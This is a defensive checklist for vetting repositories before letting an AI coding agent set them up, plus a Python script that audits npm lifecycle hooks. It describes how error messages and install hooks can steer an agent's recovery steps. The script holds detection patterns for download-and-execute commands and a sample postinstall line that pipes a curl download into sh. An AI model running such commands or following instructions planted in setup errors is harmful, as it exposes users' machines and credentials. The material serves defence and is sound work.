A clean-looking repository is not automatically safe for a coding agent. The risky moment is often not the first command, but the recovery path after setup fails and the agent tries to fix it.
Start Read-Only
Ask the agent to map setup files, package scripts, install hooks, shell scripts, CI files, and documentation commands before executing anything. Treat the first pass as source review, not bootstrap.
Review The Failure Path
Error messages, init commands, helper scripts, and package lifecycle hooks can become instructions. Inspect what the agent would run after a failed setup command and whether that path fetches code or configuration at runtime.
- Which command does the error recommend?
- Which scripts or package hooks does that command invoke?
- Can any runtime-fetched content change without a Git commit?
Keep Shell And Network Narrow
Use read-only or plan-style exploration before setup. Avoid broad permission bypass outside containers or VMs, and require approval for package managers, shell wrappers, network fetches, and credential-touching commands.
Run Once In Isolation
Use a disposable container, VM, sandbox, or throwaway worktree with no production credentials, browser profile, SSH agent forwarding, or mounted home directory. Capture the transcript, diff, package scripts, and network destinations.
Promote Only When Boring
A setup path is ready for team reuse only when the commands are fixed, the network calls are known, the scripts are reviewed, and the rollback path is clear. If the agent needed unreviewed fixes, keep the repo isolated.
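One way to carry out the read-only first pass over package lifecycle hooks before any install runs, as an added Python example that is not part of this checklist or of the cited sources; the hook names follow npm's documented lifecycle scripts, while the risk patterns, the mutable-URL heuristic and the sample package.json are the editor's assumptions:

```python
import json
import re

# npm runs these scripts automatically during install, pack or publish,
# so they are the hooks an agent's recovery path can trigger unprompted.
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare",
                   "prepublish", "prepublishOnly", "prepack", "postpack"}

# Heuristic patterns for content or code pulled at runtime (assumed list,
# ordered from most to least specific; the first match wins).
RUNTIME_FETCH = [
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "pipes a download into a shell"),
    (r"\b(curl|wget)\b", "downloads content at install time"),
    (r"\bnpx\b", "executes a package fetched on demand"),
    (r"\bnode\s+-e\b", "runs inline JavaScript"),
    (r"\beval\b", "evaluates dynamic shell input"),
]
URL_RE = re.compile(r"https?://[^\s\"']+")
# A URL pinned to a 40-hex commit SHA cannot change without a new commit;
# anything else (branch, tag, plain host path) is treated as mutable.
COMMIT_SHA = re.compile(r"/[0-9a-f]{40}\b")


def audit_scripts(package_json_text):
    """Return (hook, reason, command) for every lifecycle hook found."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for name, cmd in scripts.items():
        if name not in LIFECYCLE_HOOKS:
            continue  # plain `npm run x` scripts need an explicit invocation
        reasons = []
        hit = next((why for pat, why in RUNTIME_FETCH if re.search(pat, cmd)), None)
        if hit:
            reasons.append(hit)
        for url in URL_RE.findall(cmd):
            if not COMMIT_SHA.search(url):
                reasons.append(f"fetches mutable URL {url}")
        if not reasons:
            reasons.append("runs automatically on install")
        findings.append((name, "; ".join(reasons), cmd))
    return findings


# Constructed sample manifest for illustration; not from any real project.
SAMPLE_PACKAGE_JSON = """{
  "name": "demo-app",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "curl -fsSL https://example.com/setup.sh | sh",
    "prepare": "node scripts/prepare.js"
  }
}"""

if __name__ == "__main__":
    for hook, reason, cmd in audit_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {reason}\n    {cmd}")
```

Every hook it lists is a command the agent can end up running without being asked; a hook flagged as fetching a mutable URL is the case the third failure-path question above is about.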
Sources
- Anthropic (official doc, core source): Claude Code security documentation
- Anthropic (official doc, core source): Claude Code permissions documentation
- 0DIN (third-party, community observation): "Clone This Repo and I Own Your Machine"
